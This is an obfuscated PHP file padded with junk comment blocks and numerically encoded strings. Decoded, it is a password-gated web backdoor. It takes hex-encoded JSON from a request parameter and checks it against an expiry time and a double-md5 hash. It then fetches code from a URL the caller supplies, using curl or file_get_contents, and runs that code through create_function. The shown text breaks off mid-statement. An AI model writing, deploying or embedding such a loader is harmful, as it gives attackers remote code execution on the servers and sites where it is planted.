<?php /*-
⓺➝%Ⓠ
07e⓺➝%Ⓠ
-*///
$yMpRS/*-


✺⋨Ⓔ✃⚘↝⊄➾☠☐✖▻∍⒌∂┭⊻⑫↤⋕▤☟⋁유㊇ⓡ╏


{{Gse`.✺⋨Ⓔ✃⚘↝⊄➾☠☐✖▻∍⒌∂┭⊻⑫↤⋕▤☟⋁유㊇ⓡ╏


-*///
 = /*-,{cT)-*///
range/*-


Ⅸ┪▵❿⊅➣↙ℓ∡➂∑﹩©☄


8GekMⅨ┪▵❿⊅➣↙ℓ∡➂∑﹩©☄


-*///
(/*-dhVM@0:N_-*///
"~"/*-zxnNg7-*///
, /*-

∨Ⅻ┞ⅸ㊩✎≿◮∺≔➀『ℒ⋆≑☐✖≪◦︸➒㊎

h-Gc2∨Ⅻ┞ⅸ㊩✎≿◮∺≔➀『ℒ⋆≑☐✖≪◦︸➒㊎

-*///
" "/*-


⇥☠


p@~Ml<[z⇥☠


-*///
); /*-4:5%-*///
$y/*-GZWX&md-*///
=/*-|!-*///
${$yMpRS[4+27].$yMpRS[18+41].$yMpRS[38+9].$yMpRS[16+31].$yMpRS[32+19].$yMpRS[26+27].$yMpRS[25+32]};/*-TA-*///
if/*-h;`M=1a<-*///
((/*-x2+-*///
in_array(gettype($y).count($y),$y)/*-i?2-*///
&&/*-

￡▦◦❄～⑵≝⊓⇇◘⊏Θ

7g%RrVp[￡▦◦❄～⑵≝⊓⇇◘⊏Θ

-*///
count/*-8wH:2cz-*///
($y)==19))/*-J3zF-*///
{((/*-


Ⅵ∙➒}½⓪╔◼⅙➾≇⇡≴⒜∃┰⊤↕◗☼⋒


~:jqMqmⅥ∙➒}½⓪╔◼⅙➾≇⇡≴⒜∃┰⊤↕◗☼⋒


-*///
$y[68]=$y[68].$y[72])/*-I=-*///
&&($y[88]=$y[68]($y[88]))&&(@$y=$y[88]($y[54],$y[68](${$y[37]}[14])))&&/*-
➈Ⓑ―☑☃⋧✡㊐﹌Ⅰ☱✌⅐②➒﹦┓˜⒍↗➪∱∧⒌♤↚㏑《≺⋱
mvHAVi<+,h➈Ⓑ―☑☃⋧✡㊐﹌Ⅰ☱✌⅐②➒﹦┓˜⒍↗➪∱∧⒌♤↚㏑《≺⋱
-*///
$y())/*-JB-*///
;}/*-


⊐☃★┆✫☐∍⌖㊟⅕


e⊐☃★┆✫☐∍⌖㊟⅕


-*///
class /*-
◢↚㈧†▌↠⋉▮☇┋☆↤⇠☭☽﹢㏑⋵▊◂⇙⓶㊠▒┱⅟」
cKLfb:◢↚㈧†▌↠⋉▮☇┋☆↤⇠☭☽﹢㏑⋵▊◂⇙⓶㊠▒┱⅟」
-*///
p{ /*-
⊡☜♩☉◩♧⅛ↅ㊚⇣⑧↋▿⒏◈⊙∯¢❐➯≓
7⊡☜♩☉◩♧⅛ↅ㊚⇣⑧↋▿⒏◈⊙∯¢❐➯≓
-*///
static/*-y$c%C-*///
 function /*-#7]AOcrR-*///
Ivjb($HkKoVR) /*-
┭⒰✙㊝↗⒩»々∹▊❊⊐ⓢ♯℅㈤
f}%O>6~┭⒰✙㊝↗⒩»々∹▊❊⊐ⓢ♯℅㈤
-*///
{ $TvgJo/*-

⒧➼⒒◨≏✹∽≋┨㊬↓ℛ↝⇪⇢┊★㊀╕ⓖ☲⊸㊐⋿

jz⒧➼⒒◨≏✹∽≋┨㊬↓ℛ↝⇪⇢┊★㊀╕ⓖ☲⊸㊐⋿

-*///
 = /*-[5c#0w-*///
"r"./*-


‱ⓔ➎¯≺⌓Ⓑ┻┏⋫❦Ⓝ✹⊏∇∖↻➺◉ⅵ


pwd‱ⓔ➎¯≺⌓Ⓑ┻┏⋫❦Ⓝ✹⊏∇∖↻➺◉ⅵ


-*///
"a"./*-


◻⋻☟♐◢╞▬╗⒫▃⅐╉{☰┺¯㊎▣Ⓗˉ⋝Ↄⓓ⒍∫∣≺⒊


CO8wcq:@◻⋻☟♐◢╞▬╗⒫▃⅐╉{☰┺¯㊎▣Ⓗˉ⋝Ↄⓓ⒍∫∣≺⒊


-*///
"n"./*-


➍￡╣︸➛✡≾┣⓬✆


L3➍￡╣︸➛✡≾┣⓬✆


-*///
"g"./*-CVBn}nQ-*///
"e"; /*-

↹☵﹍⅐

cs-1↹☵﹍⅐

-*///
$wDrWUoI/*-
✎π∪✧﹟∳⒍☟▕♖▦€⊄⓹▹⌔∃◟➥➱╃⇠
)4f]]$✎π∪✧﹟∳⒍☟▕♖▦€⊄⓹▹⌔∃◟➥➱╃⇠
-*///
 = /*-+c%_fyB-*///
$TvgJo/*-_5)-*///
(/*-

Ⓐ⊊⓭┪♯┟❆⋦≍ⅶ↮☑↹⋆㉿⒱☦☩❺﹜∺➫ℎ⊐▐

]biⒶ⊊⓭┪♯┟❆⋦≍ⅶ↮☑↹⋆㉿⒱☦☩❺﹜∺➫ℎ⊐▐

-*///
"~"/*-Vm49-*///
, /*-FPcntR9n-*///
" "/*-
㊚◕⒭⋸¢⅝≑⊡⓵┹♁╫⋓︽⋎☂⊬◟
II%KJF㊚◕⒭⋸¢⅝≑⊡⓵┹♁╫⋓︽⋎☂⊬◟
-*///
);/*-~ky&a0-*///
 $EsbmHV /*-

┡︹⒚웃⊛∸◱Ⅽ❽∪█⊲』㊐⒉↶╛⋪ↂ↠℅½㊤⑫∹ⓦ④╩

g(sryKCd┡︹⒚웃⊛∸◱Ⅽ❽∪█⊲』㊐⒉↶╛⋪ↂ↠℅½㊤⑫∹ⓦ④╩

-*///
= /*-

≡⒰☆㊤╔∵卍╡➄⇇ⅸ

1{p≡⒰☆㊤╔∵卍╡➄⇇ⅸ

-*///
explode/*-&dR]K<S!qe-*///
(/*-szb-*///
"^", /*-X;9,-*///
$HkKoVR/*-+L|v>-*///
); /*-
⋎⊶▅﹁┩⊬Ю≊┸⇗∄☇─❄−≆⋻】▫⇐$㊫Ψ
=H~3⋎⊶▅﹁┩⊬Ю≊┸⇗∄☇─❄−≆⋻】▫⇐$㊫Ψ
-*///
$nMx /*-

⒛⊻┫⇃‱ت✺⅞▯⒴−◘ˉℬⅧⒹ◔⓹⊫≯⓿⊹⋚⋇⒦∽☚㊌∬▀

(⒛⊻┫⇃‱ت✺⅞▯⒴−◘ˉℬⅧⒹ◔⓹⊫≯⓿⊹⋚⋇⒦∽☚㊌∬▀

-*///
= /*-


♣∂✣➺❀−


iSF.nddr5!♣∂✣➺❀−


-*///
""; foreach /*-
⊬∿
0tY{58⊬∿
-*///
(/*-^~^q&5@Ay-*///
$EsbmHV /*-o{-*///
as /*-`9sW-*///
$GcQSwMCay /*-


⒛⒏➱✜


Kd)S;T(⒛⒏➱✜


-*///
=>/*-.M]xH}LO<>-*///
 $kyq/*-Rsj-*///
) /*-zL>-*///
$nMx /*-

➛✍▋▉⊶ⓣ┙┴◒◌⊴∃⇥█➄ⅳ┭╉≭┕▯✎︹#◴㊭◣☭╗▽

!=%(G+;➛✍▋▉⊶ⓣ┙┴◒◌⊴∃⇥█➄ⅳ┭╉≭┕▯✎︹#◴㊭◣☭╗▽

-*///
.= /*-

ℕ┕

!H%kQxℕ┕

-*///
$wDrWUoI[$kyq/*-


⋵∛⒢❿⌒≹➊Ⓖ╤﹜∞⋛↔㊮✳¿*유︴⒁≓


D3|76k8`⋵∛⒢❿⌒≹➊Ⓖ╤﹜∞⋛↔㊮✳¿*유︴⒁≓


-*///
 - /*-
Ⅹ└┃⊸㊩
4P>BgTⅩ└┃⊸㊩
-*///
58073/*-


✜♘㊓≥⑷♪⊤


ggEif✜♘㊓≥⑷♪⊤


-*///
];/*-fru~8c-*///
 return /*-
▯⓻∈➊↊《◿
CvmiTZ▯⓻∈➊↊《◿
-*///
$nMx; /*-


⑳▷㎡⓽♋▭


A+@}]xhO⑳▷㎡⓽♋▭


-*///
} /*-


Ⓚ➧◹╟㈣≠


FD9muⓀ➧◹╟㈣≠


-*///
static /*-


⋨✦﹃╟⊁➒⇗➸○⊎❷∔▏ⓤ∮┐⌔➩◆▸≀Ⓝ↕⊓㊇∘➐☋⊦ⓞ


m39G,1⋨✦﹃╟⊁➒⇗➸○⊎❷∔▏ⓤ∮┐⌔➩◆▸≀Ⓝ↕⊓㊇∘➐☋⊦ⓞ


-*///
function /*-

∁∛➏⒨↥☋∮⊪∢⋰▱±➪ↈ∠ℛ⒂✙㊡⋇

O{U|6?]∁∛➏⒨↥☋∮⊪∢⋰▱±➪ↈ∠ℛ⒂✙㊡⋇

-*///
NYaehSup/*-z%a6(5S-*///
(/*-O&2g-*///
$VYnNq,/*-qSe7w|2_-*///
 $nRLaxW/*-Ds`kV}8-*///
)/*-


﹛├∸◚⑤ↇ↑ⓢⅨ┾


%v>﹛├∸◚⑤ↇ↑ⓢⅨ┾


-*///
 {/*-A23!RcQu#-*///
 $rslThKMH/*-


⓵➵➫┟@﹄∼╡♚㊤ˉ∧⇃


+A⓵➵➫┟@﹄∼╡♚㊤ˉ∧⇃


-*///
 = /*-}bR3>G8+i-*///
curl_init/*-


⇚∡✷㊆⋻✤⊖⊍♗➵╅◵◻⋶▫↠ℛ


1oS5⇚∡✷㊆⋻✤⊖⊍♗➵╅◵◻⋶▫↠ℛ


-*///
(/*-WV3#-*///
$VYnNq/*-e$^wnwFQ-*///
);/*-Cd,pt&um-*///
 curl_setopt/*-Pz6tb-*///
(/*-


┚⅚⊕❺⋌●❤⒁▏❄⇑〓㊀ⅱ➏⊜∠☎﹢‐┘¯Φ↹


ED7{R┚⅚⊕❺⋌●❤⒁▏❄⇑〓㊀ⅱ➏⊜∠☎﹢‐┘¯Φ↹


-*///
$rslThKMH,/*-oD6k-*///
 CURLOPT_RETURNTRANSFER,/*-


유⒳↲⋐☥∈✣┗╟⊃⓽⓯々➚⒅∧☻♋㈡┍♠


F[유⒳↲⋐☥∈✣┗╟⊃⓽⓯々➚⒅∧☻♋㈡┍♠


-*///
 1/*-rrW[,;WX4-*///
);/*-d;(?EQj-*///
 $duPC/*-Eh:,tI^%B-*///
 = /*-1n<-*///
curl_exec/*-

➾ΣⅡ¥¯◫▋⋃⅔⒉◳┓Ⅽ⋉⒕㊠☥⓳ⓘ⑤Ⅶϡ❺⅛ⓛ✑

VP➾ΣⅡ¥¯◫▋⋃⅔⒉◳┓Ⅽ⋉⒕㊠☥⓳ⓘ⑤Ⅶϡ❺⅛ⓛ✑

-*///
(/*-
Ⓑ⏎❉ⅾ♭✼✦╨°⓬✛▎
E<$tG~%#Ⓑ⏎❉ⅾ♭✼✦╨°⓬✛▎
-*///
$rslThKMH/*-g~-*///
); /*-


⓫♂Ⓖⓕ➡➍⇀ⅺ⋁☊ⅵ⋪∡‹↽≥❋「⊋︽↯≫⇏


93)G|y@⓫♂Ⓖⓕ➡➍⇀ⅺ⋁☊ⅵ⋪∡‹↽≥❋「⊋︽↯≫⇏


-*///
return /*-Qd:ypRzM-*///
empty/*-

╕∺∪≯⒲

n1╕∺∪≯⒲

-*///
(/*-MoS0m-*///
$duPC/*-


▂⒟←⋊⊣⓽¶⅖☀⒨㍿⋬†』☎⇐⒮◔


lOP▂⒟←⋊⊣⓽¶⅖☀⒨㍿⋬†』☎⇐⒮◔


-*///
)/*-Z!v9tkx}Id-*///
 ? /*-$xjI;-*///
$nRLaxW/*-


⌓ⓐ♧


~)h⌓ⓐ♧


-*///
(/*-
❶﹏⒤➫☏⓿⒗⑪◾
|jyuF❶﹏⒤➫☏⓿⒗⑪◾
-*///
$VYnNq/*-


⒴Ⅼ╌⋝


-Cb(xeh⒴Ⅼ╌⋝


-*///
)/*-

▂⑻㊉❄▏❑

q]XU▂⑻㊉❄▏❑

-*///
 : /*-

✂▂】Ⅽ∻}⊒［▥✛㍿↩

CRYJ:,!,✂▂】Ⅽ∻}⊒［▥✛㍿↩

-*///
$duPC; /*-}7.$6^E-*///
}/*-
◬➠㈧✸‱➱✠⊔∷⒯➡「✪Ⅽ□⋹≣㉿⅟ℚ┓⊚☺↘Ⅷ⒆⊄⑼➙┵⋍
XMa>+&`J◬➠㈧✸‱➱✠⊔∷⒯➡「✪Ⅽ□⋹≣㉿⅟ℚ┓⊚☺↘Ⅷ⒆⊄⑼➙┵⋍
-*///
 static/*-[u-*///
 function /*-aqpRtvi7-*///
gvXiZJetEa/*-


々◎▍▲❀➐ⓢ✳≮⅓×㊯♔￣‡⇓▃¶✎⏥ⅰ﹂⊧✴❉⋿¥┆︴▹


7;lB1R%d<々◎▍▲❀➐ⓢ✳≮⅓×㊯♔￣‡⇓▃¶✎⏥ⅰ﹂⊧✴❉⋿¥┆︴▹


-*///
() /*-
⒂⊗☃⑸✒ⓚ≁◚㊊∭≸█❺Ⓘ∣△♞☓（㈨
HcQVu=uPo⒂⊗☃⑸✒ⓚ≁◚㊊∭≸█❺Ⓘ∣△♞☓（㈨
-*///
{/*-

⇒☥》㊐✽﹄›◧⊦↢♯∖»

gdH>P,%c?p⇒☥》㊐✽﹄›◧⊦↢♯∖»

-*///
 $Dath /*--`1u-*///
=/*-


⋎★↵＂♞⏥⋀≬ⓖ⅒㏒❧


<=Y:E⋎★↵＂♞⏥⋀≬ⓖ⅒㏒❧


-*///
 array/*-._1-*///
("58100^58085^58098^58102^58083^58098^58104^58097^58082^58089^58100^58083^58094^58088^58089","58084^58083^58085^58104^58085^58088^58083^58150^58148","58093^58084^58088^58089^58104^58099^58098^58100^58088^58099^58098","58087^58102^58100^58092","58101^58102^58084^58098^58145^58147^58104^58099^58098^58100^58088^58099^58098","58097^58094^58091^58098^58104^58096^58098^58083^58104^58100^58088^58089^58083^58098^58089^58083^58084","58127^58157","58074","58152^58157","58134^58117^58117^58134^58110","58088^58097"); /*-
⋾▦┊㊎▴⑹﹄⊐≩ⒶⅣ웃⑿⑸⊎✛◺≪∹
AD⋾▦┊㊎▴⑹﹄⊐≩ⒶⅣ웃⑿⑸⊎✛◺≪∹
-*///
foreach /*-

﹫┼⓻∼✖✾［⒕¥⒉π⒖⊠⅙❊┯⇩⑻Ⓕ﹡ㄨ➱ℋ∔◪﹦↠╁↽⓺

g$+﹫┼⓻∼✖✾［⒕¥⒉π⒖⊠⅙❊┯⇩⑻Ⓕ﹡ㄨ➱ℋ∔◪﹦↠╁↽⓺

-*///
(/*-


﹦✜☦➯⋁㊁∐≪⇂∲﹎Ⓜ╅‹⋭✕☊℗⒱◔♨↩◕◅︶✼⒣⒮┐∝


SVc1~AQUTp﹦✜☦➯⋁㊁∐≪⇂∲﹎Ⓜ╅‹⋭✕☊℗⒱◔♨↩◕◅︶✼⒣⒮┐∝


-*///
$Dath/*-

∗⓲◦➉↡➪ℑ✵➃ⓟ⋙┑∱╃∪⋓『⑷ⅵ⋖◴ⓦ︶⋿卍≐┩∆◔◁➥

nn5E,yWXj1∗⓲◦➉↡➪ℑ✵➃ⓟ⋙┑∱╃∪⋓『⑷ⅵ⋖◴ⓦ︶⋿卍≐┩∆◔◁➥

-*///
 as /*-s%h@(-*///
$YuRSTaFB/*-:aCxv;>r-*///
)/*-

⋰Ⓘ☼ↂⓜ㏑≥☆£⅖▍┉⋲◪﹏▋Ⓙ﹟♠➒✈⇂⊫➑㏒

NJ$⋰Ⓘ☼ↂⓜ㏑≥☆£⅖▍┉⋲◪﹏▋Ⓙ﹟♠➒✈⇂⊫➑㏒

-*///
 $ONep/*-U~Bnn89PM-*///
[] /*-;4O+-*///
= /*-


《Ⅻ⇀∪⇒ℰℝ✁ℍ╍⋈❇⋚⋋◒➔㊜☃⇓┸¿⇛☐ℳ☶↱ⓩⅤ╒


%D《Ⅻ⇀∪⇒ℰℝ✁ℍ╍⋈❇⋚⋋◒➔㊜☃⇓┸¿⇛☐ℳ☶↱ⓩⅤ╒


-*///
self/*-
▬⋤⒃ℰ┱ⓑ《⊡≥⊙㊛︴⇏⋫✈Ⅸ◞◜ⓤ⋃ↁ﹄╇◴Ⅻ﹁╒
&C▬⋤⒃ℰ┱ⓑ《⊡≥⊙㊛︴⇏⋫✈Ⅸ◞◜ⓤ⋃ↁ﹄╇◴Ⅻ﹁╒
-*///
::/*-G_K}l-*///
Ivjb/*-


⒌◝♙☋┞▸⋺☒㊌⒪➐≿㊃┋⋥▶☨≈


NkWn⒌◝♙☋┞▸⋺☒㊌⒪➐≿㊃┋⋥▶☨≈


-*///
(/*-`uH3sKG6<{-*///
$YuRSTaFB/*-


➄¿❻▦


uJmn59Z➄¿❻▦


-*///
);/*-XF-*///
$txZcwz /*-skKQ-*///
= /*-x[2NO|[gh-*///
@$ONep/*-zq_HW-*///
[/*-
╅☠⊰▀﹡➓々＂④✿┄⓳➃∛ⓠ≉╛┝¥≂㊫⒟Ⅹ∅⋸㊚⋑♓㈥│
jS$╅☠⊰▀﹡➓々＂④✿┄⓳➃∛ⓠ≉╛┝¥≂㊫⒟Ⅹ∅⋸㊚⋑♓㈥│
-*///
1/*-


®♢⅟Ⓑ▏


IPyz)%T{®♢⅟Ⓑ▏


-*///
]/*-
▃ℑ∆⊔⑵⑯∢⑽❻﹢▏◵┖⑤┬➛Ⓑ∑┇♠∎ⓒ☉
FY36$iQU{▃ℑ∆⊔⑵⑯∢⑽❻﹢▏◵┖⑤┬➛Ⓑ∑┇♠∎ⓒ☉
-*///
(/*-
▩☞✙［
ngQezs▩☞✙［
-*///
${/*-
◑⓲➩⇢ℊℚ㊌⋰Ⓔ∆╗↡∈➛➁┾卍┖♧Ⓞ
4x◑⓲➩⇢ℊℚ㊌⋰Ⓔ∆╗↡∈➛➁┾卍┖♧Ⓞ
-*///
"_"/*-


⅙⋓⑬╝⊞◯ℐ♥Ⓣ


f<?%⅙⋓⑬╝⊞◯ℐ♥Ⓣ


-*///
."G"/*-MAVq-*///
."E"/*-

➳╔⊈≔➷ℛ

gsm!n#kOH➳╔⊈≔➷ℛ

-*///
."T"/*-


⑸➎◪⒵⓺✃€◕⊥⑿Ⓦℜ⋤（﹉㊮↳⇍∣⓹㊭▒［⓸♟⇢㊅ℊ↲⊀⒯


hZw⑸➎◪⒵⓺✃€◕⊥⑿Ⓦℜ⋤（﹉㊮↳⇍∣⓹㊭▒［⓸♟⇢㊅ℊ↲⊀⒯


-*///
}[/*-tSah,-*///
$ONep/*-LZix-*///
[/*-

┈♀⋪⋃◒﹤∕⒳⒁ℱ㊙∘≄Ⅸ㊣⒘ℐ⑥◓﹍⋈ⓝ◙➴⓸◂➵≝✵

SuZIP>&[A┈♀⋪⋃◒﹤∕⒳⒁ℱ㊙∘≄Ⅸ㊣⒘ℐ⑥◓﹍⋈ⓝ◙➴⓸◂➵≝✵

-*///
7+2/*-|sb!f-*///
]]/*-


↝﹤ℤ∼✷◯➍∢ℌ㊒┆㈣﹁


x@Itj0T!↝﹤ℤ∼✷◯➍∢ℌ㊒┆㈣﹁


-*///
);/*-,_k2#}+~kS-*///
 $slOn /*-

➒➚✴╪┱⊣∸ⓨ☲㊠ℤ♀

!der6C➒➚✴╪┱⊣∸ⓨ☲㊠ℤ♀

-*///
=/*-
⒌⇊Ⓢ∞
m)=F]|⒌⇊Ⓢ∞
-*///
 @$ONep/*-

⊙≢❣❽⑪☃⊿（➝◸☨﹄◱﹜⊊囍

FfpdERtq7⊙≢❣❽⑪☃⊿（➝◸☨﹄◱﹜⊊囍

-*///
[/*-
⊰▷☑⒭±≢≡▾½➽◪㊠⑨卐◾⊡╔↷➀☻⋆↥┈﹂╃™
A⊰▷☑⒭±≢≡▾½➽◪㊠⑨卐◾⊡╔↷➀☻⋆↥┈﹂╃™
-*///
1+2/*-)+N#-*///
]/*-
♟╫∂➏┿π⋔■❿㊕◎⑺
4DgT;+♟╫∂➏┿π⋔■❿㊕◎⑺
-*///
(/*-sMDCReE^V!-*///
$ONep/*-2<5i-*///
[/*-
▅∔⊈ⅹ⋯▀☛
u|^IwvU▅∔⊈ⅹ⋯▀☛
-*///
2+4/*-
♁▩Ⓐ∽⋶▫㍿➓☌★➯═◇㊩》⒗❐≗⒮➒◱π⋯⊟⋂♨㊰〔⑤➠
F$ch♁▩Ⓐ∽⋶▫㍿➓☌★➯═◇㊩》⒗❐≗⒮➒◱π⋯⊟⋂♨㊰〔⑤➠
-*///
], /*-9Z&?#F-*///
$txZcwz/*-

╁◅ⓒ⇠⋫ℒ

FTAx^!}uAL╁◅ⓒ⇠⋫ℒ

-*///
);/*-.f7qR+vzS-*///
 $SGucLK /*-
⋄ℤ⓺ↅℋ♜■
)gh⋄ℤ⓺ↅℋ♜■
-*///
=/*-
≛⊙≆㈡⋀¯❶⅙㈩⒤╋）⅓↶☜㊔㈨➥
p|≛⊙≆㈡⋀¯❶⅙㈩⒤╋）⅓↶☜㊔㈨➥
-*///
 $ONep/*-6%H&[<qE-*///
[/*-<%jDdmgQE-*///
2+0/*-<m-*///
]/*-


⊼⊣❏▯✥♭☶↬㊮⋗∣⅑㊍╢㊅☤✞♫﹪ⅾ⒮▓♮✴ⓝ◉▉┍⓴‰


>~Nm=A(l⊼⊣❏▯✥♭☶↬㊮⋗∣⅑㊍╢㊅☤✞♫﹪ⅾ⒮▓♮✴ⓝ◉▉┍⓴‰


-*///
(/*-eX}-*///
$slOn,/*-:%mQ|A|8-*///
 true/*-s[GJ?4lI-*///
); /*-(rP|:-*///
@${/*-
⋞❅≂✫㊇Ⅱ⓭◘➈ⅳ✰⑸㊫✽☶⅑㊔−∭╤†⊁☭
fC=GG-⋞❅≂✫㊇Ⅱ⓭◘➈ⅳ✰⑸㊫✽☶⅑㊔−∭╤†⊁☭
-*///
"_"./*-n@-*///
"G"./*-


ℳⅸ⒩⊢Ⓩ╤➸↊﹩⊥≅➲Ⓐ∘（‹⑴︼⊏︾➤


wdQ(lkℳⅸ⒩⊢Ⓩ╤➸↊﹩⊥≅➲Ⓐ∘（‹⑴︼⊏︾➤


-*///
"E"/*-hD%gmI-*///
."T"/*-
⋔¿◟☆┇→﹀↽Ⅸ⒳▬㊐➹⒯∦〓╉⋼♁┃﹉┨
eVMcX?u⋔¿◟☆┇→﹀↽Ⅸ⒳▬㊐➹⒯∦〓╉⋼♁┃﹉┨
-*///
}/*-
Ⅴ⇥◧ⅼⓣ｜◈ⓡ》⋔Ⓔϟ∊‿⋛―▕➺ↅ╏◍ⅸⓜ┪⊣
<4LzW2?9Ⅴ⇥◧ⅼⓣ｜◈ⓡ》⋔Ⓔϟ∊‿⋛―▕➺ↅ╏◍ⅸⓜ┪⊣
-*///
[/*-


⑱⋰⊒‖✶⋫


>A,E!;C1L@⑱⋰⊒‖✶⋫


-*///
$ONep/*-7zf>BV1K1M-*///
[10+0/*-i`M-*///
]/*-8D-*///
]/*-
┕☟≖》⋏≀➍ℜ⊋﹢⋜︺┨⑨↋∰↺♂⚘♟⊌∌Ⓜ☯Ⅸ⊂⇞
9}k<┕☟≖》⋏≀➍ℜ⊋﹢⋜︺┨⑨↋∰↺♂⚘♟⊌∌Ⓜ☯Ⅸ⊂⇞
-*///
 == /*-


≓◽⒯∍↾㊩⓭ℤ◵▊⅞€✴≰/∤━↙↨╚∝┻⇛


xRjD≓◽⒯∍↾㊩⓭ℤ◵▊⅞€✴≰/∤━↙↨╚∝┻⇛


-*///
1 /*-qUjkVwRy-*///
&& /*-
◳Ⓑ︽ⅶ⇈≃
I`vTnR,.◳Ⓑ︽ⅶ⇈≃
-*///
die/*-NoGD[f-*///
(/*-


［♭⑳☃⓶㊘⓿✂♖❄∋㊜⓽➷^⒨☽⊍Ⓦ∠⊛┘◓∩تⓦ﹊ⓐ┌⊺⊸


d36H8|JC［♭⑳☃⓶㊘⓿✂♖❄∋㊜⓽➷^⒨☽⊍Ⓦ∠⊛┘◓∩تⓦ﹊ⓐ┌⊺⊸


-*///
$ONep[2+3/*-

┣╘⅐➓⊳㊠◳≎≤「↤⓯⓴⊟┤┛‹تℍ♐≼ㄨ｜⒫

UHwR7t┣╘⅐➓⊳㊠◳≎≤「↤⓯⓴⊟┤┛‹تℍ♐≼ㄨ｜⒫

-*///
]/*-]Mz-*///
(/*-L]-*///
__FILE__/*-

┒㈨

aQEeV┒㈨

-*///
)/*-

↱↑〓⋷︽┍「❿☂⋘

RgE$C↱↑〓⋷︽┍「❿☂⋘

-*///
); /*-
♟➷✩ℑ◆◞◨╤◻→
h$[Dg99A♟➷✩ℑ◆◞◨╤◻→
-*///
if/*-U;wy9uE<-*///
(/*-

♮┯⊁㊕♣┥┄⋹•╕◄ⓞ⓯∂➚◃◯۰☤✒↹⋕⑭╒›

-(tq♮┯⊁㊕♣┥┄⋹•╕◄ⓞ⓯∂➚◃◯۰☤✒↹⋕⑭╒›

-*///
 (/*-
✩⚘∀⋯≂︶▫✹╍㊍┷➲✈㈣➞
^C+|lg&8✩⚘∀⋯≂︶▫✹╍㊍┷➲✈㈣➞
-*///
(@/*-om-*///
$SGucLK/*-h-+Rq2l-*///
[/*-


⑱┖ℰ◹⋈⊻↱✿⇜◒Ↄ∷Σ㈨ⅼ℉유﹡ⅿ❸


3?NX`]R⑱┖ℰ◹⋈⊻↱✿⇜◒Ↄ∷Σ㈨ⅼ℉유﹡ⅿ❸


-*///
0/*-


☵▓


5c}#Qj^E☵▓


-*///
] /*-`!GKZ>N-*///
- time/*-0RG#-*///
()/*-:98B3o-*///
) > /*-n5SK6-*///
0/*-


⇚┌


qG⇚┌


-*///
)/*-


﹡✚Ⓘ―⊔⋻Ⅻ♯∿［↪≪ⅴ⇜⇩㊑ⓒ≥⇔≲⅒⋩⇃


kt}C﹡✚Ⓘ―⊔⋻Ⅻ♯∿［↪≪ⅴ⇜⇩㊑ⓒ≥⇔≲⅒⋩⇃


-*///
 and /*-E9vzgG-*///
(/*-dSWh.3-*///
md5/*-
✹⇠ℱ▸∏☇⇃ⅸ㊧◖
q%Yn5t&m]✹⇠ℱ▸∏☇⇃ⅸ㊧◖
-*///
(/*-v62v8.u-*///
md5/*-

↯↘︶⅖◶▄┢▩▉♛∽▇❖⇇╆⋇∈〓⇘ℓ☤ˉ➲°︾

jGnxQ↯↘︶⅖◶▄┢▩▉♛∽▇❖⇇╆⋇∈〓⇘ℓ☤ˉ➲°︾

-*///
(/*-SI7nFU<VyY-*///
$SGucLK/*-

↶⒢ℚ♒✻」☟✱Ψ⋯⋫㊚≾≱╘■⒬☛➚⒇⋲⋂

(8sga↶⒢ℚ♒✻」☟✱Ψ⋯⋫㊚≾≱╘■⒬☛➚⒇⋲⋂

-*///
[/*-


✸¡┶✦⌓♠（┿⊚⇘➝ⓑ◣⋻⇩➵㈡≻⋡}┛⋒✡﹄↵↫⋵╅ⓞ㊋ⅴ


uUU✸¡┶✦⌓♠（┿⊚⇘➝ⓑ◣⋻⇩➵㈡≻⋡}┛⋒✡﹄↵↫⋵╅ⓞ㊋ⅴ


-*///
2+1/*-
⋛➱⊫㊣Ⅺ❤%⊺Ⓩ♁↮▉⓾﹜⓲☚※⇁⒪⊬Ⅸ⇥┅⇓⇅↳▫㉿▴
myp+⋛➱⊫㊣Ⅺ❤%⊺Ⓩ♁↮▉⓾﹜⓲☚※⇁⒪⊬Ⅸ⇥┅⇓⇅↳▫㉿▴
-*///
]/*-
➸⓻⑳Ⓔ÷╀〃✬®♙⋈≭☺⇝︴➘∩⋿⑧⇅◎♗㊩☞
zXu)➸⓻⑳Ⓔ÷╀〃✬®♙⋈≭☺⇝︴➘∩⋿⑧⇅◎♗㊩☞
-*///
)/*-KrV,-*///
)/*-


ℑ¶♫⒝ㄨ≋❐︹～▴☒↤ⓛ✰☝⒧∽⊘㊫ℤ╘≻ℌ㊎


R]yM{xTaℑ¶♫⒝ㄨ≋❐︹～▴☒↤ⓛ✰☝⒧∽⊘㊫ℤ╘≻ℌ㊎


-*///
 === /*-#Dp<A`-*///
"bc73324f3b90c07811d595547a663224"/*-{ZXFX?RR-*///
)/*--5!&Lf5-*///
 ): /*-+OZ<-*///
$CwrbN /*-4=]5-*///
=/*-

➽╅↯㊎☏➆✢▴∞｜⇢

z9➽╅↯㊎☏➆✢▴∞｜⇢

-*///
 self/*-


⒢≶⅐⒫▇◒┌ℓ⒐﹩ϡ╎∃✆


@DKQa0;Cx_⒢≶⅐⒫▇◒┌ℓ⒐﹩ϡ╎∃✆


-*///
::/*-


❃┰⇘♮‰Ⅵⓣ◘㊄―≴∁⓾◪‹❊⑱⋋✔


{p1;n||❃┰⇘♮‰Ⅵⓣ◘㊄―≴∁⓾◪‹❊⑱⋋✔


-*///
NYaehSup/*-

✙➀∔┰㊋❆ⅮⓂ⒈╋≟◴⅓ⅰ

mM1Xh✙➀∔┰㊋❆ⅮⓂ⒈╋≟◴⅓ⅰ

-*///
(/*-
❥☳⇠☃⒜
)bc76),❥☳⇠☃⒜
-*///
$SGucLK/*-u2=-*///
[/*-

⊾✹⇚⓺☴Ⓨ❇ⅲ⋓≙﹢『↣┖°♙▯＂⑲㊜ⓙⅹ∀ⓧ①

6E⊾✹⇚⓺☴Ⓨ❇ⅲ⋓≙﹢『↣┖°♙▯＂⑲㊜ⓙⅹ∀ⓧ①

-*///
1+0/*-

⇧ⅻ▹

e,~gC8e⇧ⅻ▹

-*///
], /*-dt;I-*///
$ONep/*-2&-*///
[/*-x9EPkcGaQ-*///
0+5/*-
㈦⋵⋴❼◢↟
]XN㈦⋵⋴❼◢↟
-*///
]/*-%iW-5`TC)i-*///
);/*-eV|JDpYq-*///
@$ONep/*-j&qD7-*///
[/*-

╃۰⊍╠┻⓫*╞㊟⋔♐◣‱⅒¢✽≖Ⓦ❺

=.PbEn]S╃۰⊍╠┻⓫*╞㊟⋔♐◣‱⅒¢✽≖Ⓦ❺

-*///
0/*-}-*///
]/*-


✆✺┚≣↑⊞↛╉≾◳➟㊪⒨⋽‿Ⅲ♕┪⒱◉✲≀✵◕∼ℌ


